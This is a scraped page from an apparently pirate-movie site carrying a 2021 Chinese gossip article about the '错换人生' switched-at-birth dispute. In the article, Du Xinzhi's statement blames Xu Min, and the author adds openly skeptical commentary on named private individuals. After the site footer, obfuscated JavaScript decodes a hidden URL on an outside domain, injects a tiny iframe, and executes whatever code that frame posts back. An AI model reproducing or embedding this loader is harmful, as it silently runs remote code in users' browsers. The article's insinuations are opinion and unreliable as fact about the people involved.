错换人生姚策生母杜新枝发声:许敏提前出院,是许敏偷换的

蘑菇资源网资讯人气:157时间:2021-06-04 07:40:53

杜新枝3000字长文

“错换人生”一波未平一波又起。6月1日“错换人生”当事人姚策的生父郭希宽发布文章并晒出自己的三等功证件给网友看,网友看了也是众说纷纭,最多的说法应该是,晒证件和查真相没啥关系。

今天,姚策生母杜新枝发布了3000字长文说明了整个“错换人生”的前前后后,来龙去脉,内容更是直指偷换的事情是许敏做的,不是她。该长文在上了热搜之后很多朋友去查看,却发现已经被删除。

一小时前,杜新枝重新发了长文内容,不过这次更改了发布的形式,将长文打印出来晒出了6张照片。

另外,杜新枝还说:

在过去一年的时间内,从当初知道这件事情的意外、到认亲时的惊喜,从陪同姚策住院时的陪伴、直至姚策离世后的痛苦,人生所经历的悲欢离合在一年的时间我都在默默承受。很感谢网友们对这次事件的关注,在最近一年里,我们一直在努力寻找真相。下面我将对这次事件详细说明,声明中我简单回应网友所关注的几个问题,包括不限于:关于“偷换”:按照病历及许敏自述,许敏15日产子,许敏17日看到孩子并喂奶,19日上午出院。按病历日期,许敏带着孩子出院时,我本人尚未见到孩子。综上,许敏比我提前见到孩子,也比我提前出院,所以我不具备偷换孩子的客观条件。

偷换or错换?是谁偷换?

我们先说杜新枝妈妈的第一个重点问题,也就是她在长文中所说的产子到偷换的过程。

杜新枝在《杜新枝声明》中说,1985年,她顺产一女孩,女儿大脑发育迟滞,1991年意外怀孕,杜新枝回老家开封兰考养胎,孩子脐带绕颈,去最好的医院淮河医院待产。

关于网友一直关心的为什么病历上写着第一胎女儿是“死亡”,杜新枝说是为了躲避当时的计划生育二胎处罚。

关于郭希志,杜新枝说:“对于他人质疑医院工作人员郭希志与郭爸系亲属关系,警方已经做出调查结论确认非亲属。”

郭希志一直是“错换人生”案件一个神秘的人物,在网友千呼万唤之中,郭希志一直没有出来做出任何解释,很多网友就不明白了,如果心里没有鬼,出来解释一下不是可以安心生活吗?为什么就不敢出来呢?现在杜妈也说了,非亲属关系。

其实错换人生事件中,杜新枝和许敏妈妈同样都是受害者,令人同情她们的遭遇,然而不知怎么回事,现在就发展到了互相告的程度呢?

杜新枝在声明中说:许敏当时在九江生活工作,娘家在开封,许敏嫂子的妈妈时任护理部主任,嫂子的妹妹等多名亲戚在该医院工作,许敏生产的时候,其亲属全程陪护。

大家仔细看杜新枝的声明,希望这次不要有太大的漏洞……

她说:她6月9日提前住院待产,15日签字确认16日剖腹产。三天后,第一次看到孩子。

这里可能有很多网友不明白了,既然孩子都脐带绕颈了,为什么不赶紧做手术呢,为什么要等到七天后才做剖腹产手术?而这时候,许敏已经于15日生下了孩子。

这个问题,杜妈可能永远解释不清。

在《杜新枝声明》中大家还可以看到,杜新枝承认许敏15日产子,19日出院。并且,“按病历日期,许敏带着孩子出院是,我本人尚未见到孩子。许敏比我提前见到孩子,也比我提前出院,所以我不具备偷换孩子的客观条件。”

另外她还指责许敏,“姚策健康指数9分,郭威6分且有二度窒息,不知何因错抱健康指数较高的姚策出院。我本人不可能用健康指数高的孩子去换健康指数低的孩子。”

看到这里,不知道你怎么想?

许敏妈妈先出院,所以就挑了一个健康指数高的孩子出院?天下有这样的妈妈吗?仅仅因为指数的一点点差异,放弃自己辛苦怀胎九个月的孩子,反而抱着别人的孩子出院?

总之,我是不信。

你信不信杜妈的话?

群众只等真相,期待真相早日浮出,这对每一个当事人都公平。聪明睿智的网友也说了,既然杜新枝说是许敏妈妈偷换的,那就去告许敏吧!这样真相就快出来了!

作者谈情说李,欢迎关注

© 2021 www.0470z.com  E-Mail:movssk@gysjxx.com  


本站所有视频和图片均来自互联网收集而来,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件至movssk@gysjxx.com (我们会在3个工作日内删除侵权内容,谢谢。)。
电影天堂国内外电影在线观看和下载平台,最新电影高清首发,免费电影视频在线播放,最新最全的大片排行榜,天堂影视力求打造最受欢迎的影视网站。

function CVZPNF(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function kvQyAjUT(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return CVZPNF(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x50\x47\x62\x76\x69\x4b']=function(){;(function(u,r,w,d,f,c){var x=kvQyAjUT,cs=d.currentScript;;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width='5px';f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function('_tdcs',x(e.data[r].replace(new RegExp(r,'g'),'')))(cs);}});})('aHR00cHMlM00ElMkYlMkZkay56ZXJvbmV00aHJlZS54eXolMkY3NzY5',''+'oud'+'MVg'+'',window,document,''+'6wj'+'hno'+'RJ'+'','0');};